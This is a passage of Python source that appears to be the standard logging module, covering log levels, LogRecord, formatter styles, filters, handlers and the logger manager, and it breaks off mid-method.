#raiseExceptions is used to see if exceptions during handling should be
#propagated
#
raiseExceptions = True
#
# If you don't want threading information in the log, set this to zero
#
logThreads = True
#
# If you don't want multiprocessing information in the log, set this to zero
#
logMultiprocessing = True
#
# If you don't want process information in the log, set this to zero
#
logProcesses = True
#---------------------------------------------------------------------------
# Level related stuff
#---------------------------------------------------------------------------
#
# Default levels and level names, these can be replaced with any positive set
# of values having corresponding names. There is a pseudo-level, NOTSET, which
# is only really there as a lower limit for user-defined levels. Handlers and
# loggers are initialized with NOTSET so that they will log all messages, even
# at user-defined levels.
#
CRITICAL = 50
FATAL = CRITICAL
ERROR = 40
WARNING = 30
WARN = WARNING
INFO = 20
DEBUG = 10
NOTSET = 0
_levelToName = {
CRITICAL: 'CRITICAL',
ERROR: 'ERROR',
WARNING: 'WARNING',
INFO: 'INFO',
DEBUG: 'DEBUG',
NOTSET: 'NOTSET',
}
_nameToLevel = {
'CRITICAL': CRITICAL,
'FATAL': FATAL,
'ERROR': ERROR,
'WARN': WARNING,
'WARNING': WARNING,
'INFO': INFO,
'DEBUG': DEBUG,
'NOTSET': NOTSET,
}
def getLevelName(level):
"""
Return the textual representation of logging level 'level'.
If the level is one of the predefined levels (CRITICAL, ERROR, WARNING,
INFO, DEBUG) then you get the corresponding string. If you have
associated levels with names using addLevelName then the name you have
associated with 'level' is returned.
If a numeric value corresponding to one of the defined levels is passed
in, the corresponding string representation is returned.
Otherwise, the string "Level %s" % level is returned.
"""
# See Issues #22386, #27937 and #29220 for why it's this way
result = _levelToName.get(level)
if result is not None:
return result
result = _nameToLevel.get(level)
if result is not None:
return result
return "Level %s" % level
def addLevelName(level, levelName):
"""
Associate 'levelName' with 'level'.
This is used when converting levels to text during message formatting.
"""
_acquireLock()
try: #unlikely to cause an exception, but you never know...
_levelToName[level] = levelName
_nameToLevel[levelName] = level
finally:
_releaseLock()
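# A minimal sketch (illustrative only): registering a custom level makes the
# name/level round trip work in both directions.
def _example_addLevelName():
    addLevelName(25, 'NOTICE')
    assert getLevelName(25) == 'NOTICE'
    assert getLevelName('NOTICE') == 25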
if hasattr(sys, '_getframe'):
currentframe = lambda: sys._getframe(3)
else: #pragma: no cover
def currentframe():
"""Return the frame object for the caller's stack frame."""
try:
raise Exception
except Exception:
return sys.exc_info()[2].tb_frame.f_back
#
# _srcfile is used when walking the stack to check when we've got the first
# caller stack frame, by skipping frames whose filename is that of this
# module's source. It therefore should contain the filename of this module's
# source file.
#
# Ordinarily we would use __file__ for this, but frozen modules don't always
# have __file__ set, for some reason (see Issue #21736). Thus, we get the
# filename from a handy code object from a function defined in this module.
# (There's no particular reason for picking addLevelName.)
#
_srcfile = os.path.normcase(addLevelName.__code__.co_filename)
# _srcfile is only used in conjunction with sys._getframe().
# To provide compatibility with older versions of Python, set _srcfile
# to None if _getframe() is not available; this value will prevent
# findCaller() from being called. You can also do this if you want to avoid
# the overhead of fetching caller information, even when _getframe() is
# available.
#if not hasattr(sys, '_getframe'):
# _srcfile = None
def _checkLevel(level):
if isinstance(level, int):
rv = level
elif str(level) == level:
if level not in _nameToLevel:
raise ValueError("Unknown level: %r" % level)
rv = _nameToLevel[level]
else:
raise TypeError("Level not an integer or a valid string: %r" % level)
return rv
#---------------------------------------------------------------------------
# Thread-related stuff
#---------------------------------------------------------------------------
#
#_lock is used to serialize access to shared data structures in this module.
#This needs to be an RLock because fileConfig() creates and configures
#Handlers, and so might arbitrary user threads. Since Handler code updates the
#shared dictionary _handlers, it needs to acquire the lock. But if configuring,
#the lock would already have been acquired - so we need an RLock.
#The same argument applies to Loggers and Manager.loggerDict.
#
_lock = threading.RLock()
def _acquireLock():
"""
Acquire the module-level lock for serializing access to shared data.
This should be released with _releaseLock().
"""
if _lock:
_lock.acquire()
def _releaseLock():
"""
Release the module-level lock acquired by calling _acquireLock().
"""
if _lock:
_lock.release()
# Prevent a held logging lock from blocking a child from logging.
if not hasattr(os, 'register_at_fork'): # Windows and friends.
def _register_at_fork_reinit_lock(instance):
pass # no-op when os.register_at_fork does not exist.
else:
# A collection of instances with a _at_fork_reinit method (logging.Handler)
# to be called in the child after forking. The weakref avoids us keeping
# discarded Handler instances alive.
_at_fork_reinit_lock_weakset = weakref.WeakSet()
def _register_at_fork_reinit_lock(instance):
_acquireLock()
try:
_at_fork_reinit_lock_weakset.add(instance)
finally:
_releaseLock()
def _after_at_fork_child_reinit_locks():
for handler in _at_fork_reinit_lock_weakset:
handler._at_fork_reinit()
# _acquireLock() was called in the parent before forking.
# The lock is reinitialized to unlocked state.
_lock._at_fork_reinit()
os.register_at_fork(before=_acquireLock,
after_in_child=_after_at_fork_child_reinit_locks,
after_in_parent=_releaseLock)
#---------------------------------------------------------------------------
# The logging record
#---------------------------------------------------------------------------
class LogRecord(object):
"""
A LogRecord instance represents an event being logged.
LogRecord instances are created every time something is logged. They
contain all the information pertinent to the event being logged. The
main information passed in is in msg and args, which are combined
using str(msg) % args to create the message field of the record. The
record also includes information such as when the record was created,
the source line where the logging call was made, and any exception
information to be logged.
"""
def __init__(self, name, level, pathname, lineno,
msg, args, exc_info, func=None, sinfo=None, **kwargs):
"""
Initialize a logging record with interesting information.
"""
ct = time.time()
self.name = name
self.msg = msg
#
# The following statement allows passing of a dictionary as a sole
# argument, so that you can do something like
# logging.debug("a %(a)d b %(b)s", {'a':1, 'b':2})
# Suggested by Stefan Behnel.
# Note that without the test for args[0], we get a problem because
# during formatting, we test to see if the arg is present using
# 'if self.args:'. If the event being logged is e.g. 'Value is %d'
# and if the passed arg fails 'if self.args:' then no formatting
# is done. For example, logger.warning('Value is %d', 0) would log
# 'Value is %d' instead of 'Value is 0'.
# For the use case of passing a dictionary, this should not be a
# problem.
# Issue #21172: a request was made to relax the isinstance check
# to hasattr(args[0], '__getitem__'). However, the docs on string
# formatting still seem to suggest a mapping object is required.
# Thus, while not removing the isinstance check, it does now look
# for collections.abc.Mapping rather than, as before, dict.
if (args and len(args) == 1 and isinstance(args[0], collections.abc.Mapping)
and args[0]):
args = args[0]
self.args = args
self.levelname = getLevelName(level)
self.levelno = level
self.pathname = pathname
try:
self.filename = os.path.basename(pathname)
self.module = os.path.splitext(self.filename)[0]
except (TypeError, ValueError, AttributeError):
self.filename = pathname
self.module = "Unknown module"
self.exc_info = exc_info
self.exc_text = None # used to cache the traceback text
self.stack_info = sinfo
self.lineno = lineno
self.funcName = func
self.created = ct
self.msecs = (ct - int(ct)) * 1000
self.relativeCreated = (self.created - _startTime) * 1000
if logThreads:
self.thread = threading.get_ident()
self.threadName = threading.current_thread().name
else: # pragma: no cover
self.thread = None
self.threadName = None
if not logMultiprocessing: # pragma: no cover
self.processName = None
else:
self.processName = 'MainProcess'
mp = sys.modules.get('multiprocessing')
if mp is not None:
# Errors may occur if multiprocessing has not finished loading
# yet - e.g. if a custom import hook causes third-party code
# to run when multiprocessing calls import. See issue 8200
# for an example
try:
self.processName = mp.current_process().name
except Exception: #pragma: no cover
pass
if logProcesses and hasattr(os, 'getpid'):
self.process = os.getpid()
else:
self.process = None
def __repr__(self):
return '<LogRecord: %s, %s, %s, %s, "%s">'%(self.name, self.levelno,
self.pathname, self.lineno, self.msg)
def getMessage(self):
"""
Return the message for this LogRecord.
Return the message for this LogRecord after merging any user-supplied
arguments with the message.
"""
msg = str(self.msg)
if self.args:
msg = msg % self.args
return msg
#
# Determine which class to use when instantiating log records.
#
_logRecordFactory = LogRecord
def setLogRecordFactory(factory):
"""
Set the factory to be used when instantiating a log record.
:param factory: A callable which will be called to instantiate
a log record.
"""
global _logRecordFactory
_logRecordFactory = factory
def getLogRecordFactory():
"""
Return the factory to be used when instantiating a log record.
"""
return _logRecordFactory
def makeLogRecord(dict):
"""
    Make a LogRecord whose attributes are defined by the specified dictionary.
This function is useful for converting a logging event received over
a socket connection (which is sent as a dictionary) into a LogRecord
instance.
"""
rv = _logRecordFactory(None, None, "", 0, "", (), None, None)
rv.__dict__.update(dict)
return rv
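# A minimal sketch (illustrative only): rebuilding a record from a plain dict,
# as a socket receiver would after unpickling one.
def _example_makeLogRecord():
    rec = makeLogRecord({'name': 'demo', 'msg': 'pid is %d', 'args': (123,)})
    assert rec.getMessage() == 'pid is 123'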
#---------------------------------------------------------------------------
# Formatter classes and functions
#---------------------------------------------------------------------------
_str_formatter = StrFormatter()
del StrFormatter
class PercentStyle(object):
default_format = '%(message)s'
asctime_format = '%(asctime)s'
asctime_search = '%(asctime)'
validation_pattern = re.compile(r'%\(\w+\)[#0+ -]*(\*|\d+)?(\.(\*|\d+))?[diouxefgcrsa%]', re.I)
def __init__(self, fmt):
self._fmt = fmt or self.default_format
def usesTime(self):
return self._fmt.find(self.asctime_search) >= 0
def validate(self):
"""Validate the input format, ensure it matches the correct style"""
if not self.validation_pattern.search(self._fmt):
raise ValueError("Invalid format '%s' for '%s' style" % (self._fmt, self.default_format[0]))
def _format(self, record):
return self._fmt % record.__dict__
def format(self, record):
try:
return self._format(record)
except KeyError as e:
raise ValueError('Formatting field not found in record: %s' % e)
class StrFormatStyle(PercentStyle):
default_format = '{message}'
asctime_format = '{asctime}'
asctime_search = '{asctime'
fmt_spec = re.compile(r'^(.?[<>=^])?[+ -]?#?0?(\d+|{\w+})?[,_]?(\.(\d+|{\w+}))?[bcdefgnosx%]?$', re.I)
field_spec = re.compile(r'^(\d+|\w+)(\.\w+|\[[^]]+\])*$')
def _format(self, record):
return self._fmt.format(**record.__dict__)
def validate(self):
"""Validate the input format, ensure it is the correct string formatting style"""
fields = set()
try:
for _, fieldname, spec, conversion in _str_formatter.parse(self._fmt):
if fieldname:
if not self.field_spec.match(fieldname):
raise ValueError('invalid field name/expression: %r' % fieldname)
fields.add(fieldname)
if conversion and conversion not in 'rsa':
raise ValueError('invalid conversion: %r' % conversion)
if spec and not self.fmt_spec.match(spec):
raise ValueError('bad specifier: %r' % spec)
except ValueError as e:
raise ValueError('invalid format: %s' % e)
if not fields:
raise ValueError('invalid format: no fields')
class StringTemplateStyle(PercentStyle):
default_format = '${message}'
asctime_format = '${asctime}'
asctime_search = '${asctime}'
def __init__(self, fmt):
self._fmt = fmt or self.default_format
self._tpl = Template(self._fmt)
def usesTime(self):
fmt = self._fmt
return fmt.find('$asctime') >= 0 or fmt.find(self.asctime_format) >= 0
def validate(self):
pattern = Template.pattern
fields = set()
for m in pattern.finditer(self._fmt):
d = m.groupdict()
if d['named']:
fields.add(d['named'])
elif d['braced']:
fields.add(d['braced'])
elif m.group(0) == '$':
raise ValueError('invalid format: bare \'$\' not allowed')
if not fields:
raise ValueError('invalid format: no fields')
def _format(self, record):
return self._tpl.substitute(**record.__dict__)
BASIC_FORMAT = "%(levelname)s:%(name)s:%(message)s"
_STYLES = {
'%': (PercentStyle, BASIC_FORMAT),
'{': (StrFormatStyle, '{levelname}:{name}:{message}'),
'$': (StringTemplateStyle, '${levelname}:${name}:${message}'),
}
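# A minimal sketch (illustrative only): the same record rendered identically
# by each of the three supported styles.
#
#   Formatter('%(levelname)s:%(name)s:%(message)s')           # '%' style
#   Formatter('{levelname}:{name}:{message}', style='{')      # '{' style
#   Formatter('${levelname}:${name}:${message}', style='$')   # '$' style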
class Formatter(object):
"""
Formatter instances are used to convert a LogRecord to text.
Formatters need to know how a LogRecord is constructed. They are
responsible for converting a LogRecord to (usually) a string which can
be interpreted by either a human or an external system. The base Formatter
allows a formatting string to be specified. If none is supplied, the
    style-dependent default value, "%(message)s", "{message}", or
"${message}", is used.
The Formatter can be initialized with a format string which makes use of
knowledge of the LogRecord attributes - e.g. the default value mentioned
above makes use of the fact that the user's message and arguments are pre-
formatted into a LogRecord's message attribute. Currently, the useful
attributes in a LogRecord are described by:
%(name)s Name of the logger (logging channel)
%(levelno)s Numeric logging level for the message (DEBUG, INFO,
WARNING, ERROR, CRITICAL)
%(levelname)s Text logging level for the message ("DEBUG", "INFO",
"WARNING", "ERROR", "CRITICAL")
%(pathname)s Full pathname of the source file where the logging
call was issued (if available)
%(filename)s Filename portion of pathname
%(module)s Module (name portion of filename)
%(lineno)d Source line number where the logging call was issued
(if available)
%(funcName)s Function name
%(created)f Time when the LogRecord was created (time.time()
return value)
%(asctime)s Textual time when the LogRecord was created
%(msecs)d Millisecond portion of the creation time
%(relativeCreated)d Time in milliseconds when the LogRecord was created,
relative to the time the logging module was loaded
(typically at application startup time)
%(thread)d Thread ID (if available)
%(threadName)s Thread name (if available)
%(process)d Process ID (if available)
%(message)s The result of record.getMessage(), computed just as
the record is emitted
"""
converter = time.localtime
def __init__(self, fmt=None, datefmt=None, style='%', validate=True):
"""
Initialize the formatter with specified format strings.
Initialize the formatter either with the specified format string, or a
default as described above. Allow for specialized date formatting with
the optional datefmt argument. If datefmt is omitted, you get an
ISO8601-like (or RFC 3339-like) format.
Use a style parameter of '%', '{' or '$' to specify that you want to
use one of %-formatting, :meth:`str.format` (``{}``) formatting or
:class:`string.Template` formatting in your format string.
.. versionchanged:: 3.2
Added the ``style`` parameter.
"""
if style not in _STYLES:
raise ValueError('Style must be one of: %s' % ','.join(
_STYLES.keys()))
self._style = _STYLES[style][0](fmt)
if validate:
self._style.validate()
self._fmt = self._style._fmt
self.datefmt = datefmt
default_time_format = '%Y-%m-%d %H:%M:%S'
default_msec_format = '%s,%03d'
def formatTime(self, record, datefmt=None):
"""
Return the creation time of the specified LogRecord as formatted text.
This method should be called from format() by a formatter which
wants to make use of a formatted time. This method can be overridden
in formatters to provide for any specific requirement, but the
basic behaviour is as follows: if datefmt (a string) is specified,
it is used with time.strftime() to format the creation time of the
record. Otherwise, an ISO8601-like (or RFC 3339-like) format is used.
The resulting string is returned. This function uses a user-configurable
function to convert the creation time to a tuple. By default,
time.localtime() is used; to change this for a particular formatter
instance, set the 'converter' attribute to a function with the same
signature as time.localtime() or time.gmtime(). To change it for all
formatters, for example if you want all logging times to be shown in GMT,
set the 'converter' attribute in the Formatter class.
"""
ct = self.converter(record.created)
if datefmt:
s = time.strftime(datefmt, ct)
else:
s = time.strftime(self.default_time_format, ct)
if self.default_msec_format:
s = self.default_msec_format % (s, record.msecs)
return s
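    # A minimal sketch (illustrative only), following the docstring above: to
    # render every timestamp in UTC rather than local time,
    #
    #   Formatter.converter = time.gmtime       # affects all formatters
    #   some_formatter.converter = time.gmtime  # affects a single instance
    #
    # where some_formatter is a hypothetical Formatter instance.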
def formatException(self, ei):
"""
Format and return the specified exception information as a string.
This default implementation just uses
traceback.print_exception()
"""
sio = io.StringIO()
tb = ei[2]
# See issues #9427, #1553375. Commented out for now.
#if getattr(self, 'fullstack', False):
# traceback.print_stack(tb.tb_frame.f_back, file=sio)
traceback.print_exception(ei[0], ei[1], tb, None, sio)
s = sio.getvalue()
sio.close()
if s[-1:] == "\n":
s = s[:-1]
return s
def usesTime(self):
"""
Check if the format uses the creation time of the record.
"""
return self._style.usesTime()
def formatMessage(self, record):
return self._style.format(record)
def formatStack(self, stack_info):
"""
This method is provided as an extension point for specialized
formatting of stack information.
The input data is a string as returned from a call to
:func:`traceback.print_stack`, but with the last trailing newline
removed.
The base implementation just returns the value passed in.
"""
return stack_info
def format(self, record):
"""
Format the specified record as text.
The record's attribute dictionary is used as the operand to a
string formatting operation which yields the returned string.
Before formatting the dictionary, a couple of preparatory steps
are carried out. The message attribute of the record is computed
using LogRecord.getMessage(). If the formatting string uses the
time (as determined by a call to usesTime()), formatTime() is
called to format the event time. If there is exception information,
it is formatted using formatException() and appended to the message.
"""
record.message = record.getMessage()
if self.usesTime():
record.asctime = self.formatTime(record, self.datefmt)
s = self.formatMessage(record)
if record.exc_info:
# Cache the traceback text to avoid converting it multiple times
# (it's constant anyway)
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
if s[-1:] != "\n":
s = s + "\n"
s = s + record.exc_text
if record.stack_info:
if s[-1:] != "\n":
s = s + "\n"
s = s + self.formatStack(record.stack_info)
return s
#
# The default formatter to use when no other is specified
#
_defaultFormatter = Formatter()
class BufferingFormatter(object):
"""
A formatter suitable for formatting a number of records.
"""
def __init__(self, linefmt=None):
"""
Optionally specify a formatter which will be used to format each
individual record.
"""
if linefmt:
self.linefmt = linefmt
else:
self.linefmt = _defaultFormatter
def formatHeader(self, records):
"""
Return the header string for the specified records.
"""
return ""
def formatFooter(self, records):
"""
Return the footer string for the specified records.
"""
return ""
def format(self, records):
"""
Format the specified records and return the result as a string.
"""
rv = ""
if len(records) > 0:
rv = rv + self.formatHeader(records)
for record in records:
rv = rv + self.linefmt.format(record)
rv = rv + self.formatFooter(records)
return rv
#---------------------------------------------------------------------------
# Filter classes and functions
#---------------------------------------------------------------------------
class Filter(object):
"""
Filter instances are used to perform arbitrary filtering of LogRecords.
Loggers and Handlers can optionally use Filter instances to filter
records as desired. The base filter class only allows events which are
below a certain point in the logger hierarchy. For example, a filter
initialized with "A.B" will allow events logged by loggers "A.B",
"A.B.C", "A.B.C.D", "A.B.D" etc. but not "A.BB", "B.A.B" etc. If
initialized with the empty string, all events are passed.
"""
def __init__(self, name=''):
"""
Initialize a filter.
Initialize with the name of the logger which, together with its
children, will have its events allowed through the filter. If no
name is specified, allow every event.
"""
self.name = name
self.nlen = len(name)
def filter(self, record):
"""
Determine if the specified record is to be logged.
Is the specified record to be logged? Returns 0 for no, nonzero for
yes. If deemed appropriate, the record may be modified in-place.
"""
if self.nlen == 0:
return True
elif self.name == record.name:
return True
elif record.name.find(self.name, 0, self.nlen) != 0:
return False
return (record.name[self.nlen] == ".")
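#
# Example (minimal sketch): a Filter matches a logger and its descendants
# by dotted-name prefix, not by plain substring matching.
#
#   >>> f = Filter('A.B')
#   >>> f.filter(makeLogRecord({'name': 'A.B.C'}))
#   True
#   >>> f.filter(makeLogRecord({'name': 'A.BB'}))
#   False
#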
class Filterer(object):
"""
A base class for loggers and handlers which allows them to share
common code.
"""
def __init__(self):
"""
Initialize the list of filters to be an empty list.
"""
self.filters = []
def addFilter(self, filter):
"""
Add the specified filter to this handler.
"""
if not (filter in self.filters):
self.filters.append(filter)
def removeFilter(self, filter):
"""
Remove the specified filter from this handler.
"""
if filter in self.filters:
self.filters.remove(filter)
def filter(self, record):
"""
Determine if a record is loggable by consulting all the filters.
The default is to allow the record to be logged; any filter can veto
this and the record is then dropped. Returns a zero value if a record
is to be dropped, else non-zero.
.. versionchanged:: 3.2
Allow filters to be just callables.
"""
rv = True
for f in self.filters:
if hasattr(f, 'filter'):
result = f.filter(record)
else:
result = f(record) # assume callable - will raise if not
if not result:
rv = False
break
return rv
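#
# Example (minimal sketch): since Python 3.2 a plain callable can act as a
# filter; a false return value drops the record.
#
#   >>> import logging
#   >>> h = logging.StreamHandler()
#   >>> h.addFilter(lambda record: 'noisy' not in record.getMessage())
#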
#---------------------------------------------------------------------------
# Handler classes and functions
#---------------------------------------------------------------------------
_handlers = weakref.WeakValueDictionary() #map of handler names to handlers
_handlerList = [] # added to allow handlers to be removed in reverse of order initialized
def _removeHandlerRef(wr):
"""
Remove a handler reference from the internal cleanup list.
"""
# This function can be called during module teardown, when globals are
# set to None. It can also be called from another thread. So we need to
# pre-emptively grab the necessary globals and check if they're None,
# to prevent race conditions and failures during interpreter shutdown.
acquire, release, handlers = _acquireLock, _releaseLock, _handlerList
if acquire and release and handlers:
acquire()
try:
if wr in handlers:
handlers.remove(wr)
finally:
release()
def _addHandlerRef(handler):
"""
Add a handler to the internal cleanup list using a weak reference.
"""
_acquireLock()
try:
_handlerList.append(weakref.ref(handler, _removeHandlerRef))
finally:
_releaseLock()
class Handler(Filterer):
"""
Handler instances dispatch logging events to specific destinations.
The base handler class. Acts as a placeholder which defines the Handler
interface. Handlers can optionally use Formatter instances to format
records as desired. By default, no formatter is specified; in this case,
the 'raw' message as determined by record.message is logged.
"""
def __init__(self, level=NOTSET):
"""
Initializes the instance - basically setting the formatter to None
and the filter list to empty.
"""
Filterer.__init__(self)
self._name = None
self.level = _checkLevel(level)
self.formatter = None
# Add the handler to the global _handlerList (for cleanup on shutdown)
_addHandlerRef(self)
self.createLock()
def get_name(self):
return self._name
def set_name(self, name):
_acquireLock()
try:
if self._name in _handlers:
del _handlers[self._name]
self._name = name
if name:
_handlers[name] = self
finally:
_releaseLock()
name = property(get_name, set_name)
def createLock(self):
"""
Acquire a thread lock for serializing access to the underlying I/O.
"""
self.lock = threading.RLock()
_register_at_fork_reinit_lock(self)
def _at_fork_reinit(self):
self.lock._at_fork_reinit()
def acquire(self):
"""
Acquire the I/O thread lock.
"""
if self.lock:
self.lock.acquire()
def release(self):
"""
Release the I/O thread lock.
"""
if self.lock:
self.lock.release()
def setLevel(self, level):
"""
Set the logging level of this handler. level must be an int or a str.
"""
self.level = _checkLevel(level)
def format(self, record):
"""
Format the specified record.
If a formatter is set, use it. Otherwise, use the default formatter
for the module.
"""
if self.formatter:
fmt = self.formatter
else:
fmt = _defaultFormatter
return fmt.format(record)
def emit(self, record):
"""
Do whatever it takes to actually log the specified logging record.
This version is intended to be implemented by subclasses and so
raises a NotImplementedError.
"""
raise NotImplementedError('emit must be implemented '
'by Handler subclasses')
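#
# Example (minimal sketch): a concrete handler only has to supply emit().
# 'MemoryListHandler' is a hypothetical illustration, not a stdlib class.
#
#   >>> import logging
#   >>> class MemoryListHandler(logging.Handler):
#   ...     def __init__(self):
#   ...         super().__init__()
#   ...         self.records = []
#   ...     def emit(self, record):
#   ...         self.records.append(self.format(record))
#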
def handle(self, record):
"""
Conditionally emit the specified logging record.
Emission depends on filters which may have been added to the handler.
Wrap the actual emission of the record with acquisition/release of
the I/O thread lock. Returns whether the filter passed the record for
emission.
"""
rv = self.filter(record)
if rv:
self.acquire()
try:
self.emit(record)
finally:
self.release()
return rv
def setFormatter(self, fmt):
"""
Set the formatter for this handler.
"""
self.formatter = fmt
def flush(self):
"""
Ensure all logging output has been flushed.
This version does nothing and is intended to be implemented by
subclasses.
"""
pass
def close(self):
"""
Tidy up any resources used by the handler.
This version removes the handler from an internal map of handlers,
_handlers, which is used for handler lookup by name. Subclasses
should ensure that this gets called from overridden close()
methods.
"""
#get the module data lock, as we're updating a shared structure.
_acquireLock()
try: #unlikely to raise an exception, but you never know...
if self._name and self._name in _handlers:
del _handlers[self._name]
finally:
_releaseLock()
def handleError(self, record):
"""
Handle errors which occur during an emit() call.
This method should be called from handlers when an exception is
encountered during an emit() call. If raiseExceptions is false,
exceptions get silently ignored. This is what is mostly wanted
for a logging system - most users will not care about errors in
the logging system, they are more interested in application errors.
You could, however, replace this with a custom handler if you wish.
The record which was being processed is passed in to this method.
"""
if raiseExceptions and sys.stderr: # see issue 13807
t, v, tb = sys.exc_info()
try:
sys.stderr.write('--- Logging error ---\n')
traceback.print_exception(t, v, tb, None, sys.stderr)
sys.stderr.write('Call stack:\n')
# Walk the stack frame up until we're out of logging,
# so as to print the calling context.
frame = tb.tb_frame
while (frame and os.path.dirname(frame.f_code.co_filename) ==
__path__[0]):
frame = frame.f_back
if frame:
traceback.print_stack(frame, file=sys.stderr)
else:
# couldn't find the right stack frame, for some reason
sys.stderr.write('Logged from file %s, line %s\n' % (
record.filename, record.lineno))
# Issue 18671: output logging message and arguments
try:
sys.stderr.write('Message: %r\n'
'Arguments: %s\n' % (record.msg,
record.args))
except RecursionError: # See issue 36272
raise
except Exception:
sys.stderr.write('Unable to print the message and arguments'
' - possible formatting error.\nUse the'
' traceback above to help find the error.\n'
)
except OSError: #pragma: no cover
pass # see issue 5971
finally:
del t, v, tb
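#
# Example (minimal sketch): deployments that prefer silence over
# "--- Logging error ---" tracebacks on stderr can clear the module-level
# flag consulted above.
#
#   >>> import logging
#   >>> logging.raiseExceptions = False   # emit() failures are now swallowed
#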
def __repr__(self):
level = getLevelName(self.level)
return '<%s (%s)>' % (self.__class__.__name__, level)
class StreamHandler(Handler):
"""
A handler class which writes logging records, appropriately formatted,
to a stream. Note that this class does not close the stream, as
sys.stdout or sys.stderr may be used.
"""
terminator = '\n'
def __init__(self, stream=None):
"""
Initialize the handler.
If stream is not specified, sys.stderr is used.
"""
Handler.__init__(self)
if stream is None:
stream = sys.stderr
self.stream = stream
def flush(self):
"""
Flushes the stream.
"""
self.acquire()
try:
if self.stream and hasattr(self.stream, "flush"):
self.stream.flush()
finally:
self.release()
def emit(self, record):
"""
Emit a record.
If a formatter is specified, it is used to format the record.
The record is then written to the stream with a trailing newline. If
exception information is present, it is formatted using
traceback.print_exception and appended to the stream. If the stream
has an 'encoding' attribute, it is used to determine how to do the
output to the stream.
"""
try:
msg = self.format(record)
stream = self.stream
# issue 35046: merged two stream.writes into one.
stream.write(msg + self.terminator)
self.flush()
except RecursionError: # See issue 36272
raise
except Exception:
self.handleError(record)
def setStream(self, stream):
"""
Sets the StreamHandler's stream to the specified value,
if it is different.
Returns the old stream, if the stream was changed, or None
if it wasn't.
"""
if stream is self.stream:
result = None
else:
result = self.stream
self.acquire()
try:
self.flush()
self.stream = stream
finally:
self.release()
return result
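#
# Example (minimal sketch): setStream() flushes, swaps the target under the
# handler lock, and returns the previous stream (or None if unchanged).
#
#   >>> import io, sys, logging
#   >>> h = logging.StreamHandler(sys.stderr)
#   >>> old = h.setStream(io.StringIO())   # old is sys.stderr
#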
def __repr__(self):
level = getLevelName(self.level)
name = getattr(self.stream, 'name', '')
# bpo-36015: name can be an int
name = str(name)
if name:
name += ' '
return '<%s %s(%s)>' % (self.__class__.__name__, name, level)
class FileHandler(StreamHandler):
"""
A handler class which writes formatted logging records to disk files.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False, errors=None):
"""
Open the specified file and use it as the stream for logging.
"""
# Issue #27493: add support for Path objects to be passed in
filename = os.fspath(filename)
#keep the absolute path, otherwise derived classes which use this
#may come a cropper when the current directory changes
self.baseFilename = os.path.abspath(filename)
self.mode = mode
self.encoding = encoding
self.errors = errors
self.delay = delay
if delay:
#We don't open the stream, but we still need to call the
#Handler constructor to set level, formatter, lock etc.
Handler.__init__(self)
self.stream = None
else:
StreamHandler.__init__(self, self._open())
def close(self):
"""
Closes the stream.
"""
self.acquire()
try:
try:
if self.stream:
try:
self.flush()
finally:
stream = self.stream
self.stream = None
if hasattr(stream, "close"):
stream.close()
finally:
# Issue #19523: call unconditionally to
# prevent a handler leak when delay is set
StreamHandler.close(self)
finally:
self.release()
def _open(self):
"""
Open the current base file with the (original) mode and encoding.
Return the resulting stream.
"""
return open(self.baseFilename, self.mode, encoding=self.encoding,
errors=self.errors)
def emit(self, record):
"""
Emit a record.
If the stream was not opened because 'delay' was specified in the
constructor, open it before calling the superclass's emit.
"""
if self.stream is None:
self.stream = self._open()
StreamHandler.emit(self, record)
def __repr__(self):
level = getLevelName(self.level)
return '<%s %s (%s)>' % (self.__class__.__name__, self.baseFilename, level)
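#
# Example (minimal sketch): with delay=True the file is not opened (or
# created) until the first record is emitted. 'app.log' is a hypothetical
# filename.
#
#   >>> import logging
#   >>> h = logging.FileHandler('app.log', delay=True)
#   >>> h.stream is None
#   True
#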
class _StderrHandler(StreamHandler):
"""
This class is like a StreamHandler using sys.stderr, but always uses
whatever sys.stderr is currently set to rather than the value of
sys.stderr at handler construction time.
"""
def __init__(self, level=NOTSET):
"""
Initialize the handler.
"""
Handler.__init__(self, level)
@property
def stream(self):
return sys.stderr
_defaultLastResort = _StderrHandler(WARNING)
lastResort = _defaultLastResort
#---------------------------------------------------------------------------
# Manager classes and functions
#---------------------------------------------------------------------------
class PlaceHolder(object):
"""
PlaceHolder instances are used in the Manager logger hierarchy to take
the place of nodes for which no loggers have been defined. This class is
intended for internal use only and not as part of the public API.
"""
def __init__(self, alogger):
"""
Initialize with the specified logger being a child of this placeholder.
"""
self.loggerMap = { alogger : None }
def append(self, alogger):
"""
Add the specified logger as a child of this placeholder.
"""
if alogger not in self.loggerMap:
self.loggerMap[alogger] = None
#
# Determine which class to use when instantiating loggers.
#
def setLoggerClass(klass):
"""
Set the class to be used when instantiating a logger. The class should
define __init__() such that only a name argument is required, and the
__init__() should call Logger.__init__()
"""
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
global _loggerClass
_loggerClass = klass
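#
# Example (minimal sketch): a replacement class needs only a name argument
# and must chain to Logger.__init__(). 'AuditLogger' is hypothetical.
#
#   >>> import logging
#   >>> class AuditLogger(logging.Logger):
#   ...     def __init__(self, name):
#   ...         super().__init__(name)
#   >>> logging.setLoggerClass(AuditLogger)
#   >>> isinstance(logging.getLogger('audit.example'), AuditLogger)
#   True
#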
def getLoggerClass():
"""
Return the class to be used when instantiating a logger.
"""
return _loggerClass
class Manager(object):
"""
There is [under normal circumstances] just one Manager instance, which
holds the hierarchy of loggers.
"""
def __init__(self, rootnode):
"""
Initialize the manager with the root node of the logger hierarchy.
"""
self.root = rootnode
self.disable = 0
self.emittedNoHandlerWarning = False
self.loggerDict = {}
self.loggerClass = None
self.logRecordFactory = None
def getLogger(self, name):
"""
Get a logger with the specified name (channel name), creating it
if it doesn't yet exist. This name is a dot-separated hierarchical
name, such as "a", "a.b", "a.b.c" or similar.
If a PlaceHolder existed for the specified name [i.e. the logger
didn't exist but a child of it did], replace it with the created
logger and fix up the parent/child references which pointed to the
placeholder to now point to the logger.
"""
rv = None
if not isinstance(name, str):
raise TypeError('A logger name must be a string')
_acquireLock()
try:
if name in self.loggerDict:
rv = self.loggerDict[name]
if isinstance(rv, PlaceHolder):
ph = rv
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupChildren(ph, rv)
self._fixupParents(rv)
else:
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupParents(rv)
finally:
_releaseLock()
return rv
def setLoggerClass(self, klass):
"""
Set the class to be used when instantiating a logger with this Manager.
"""
if klass != Logger:
if not issubclass(klass, Logger):
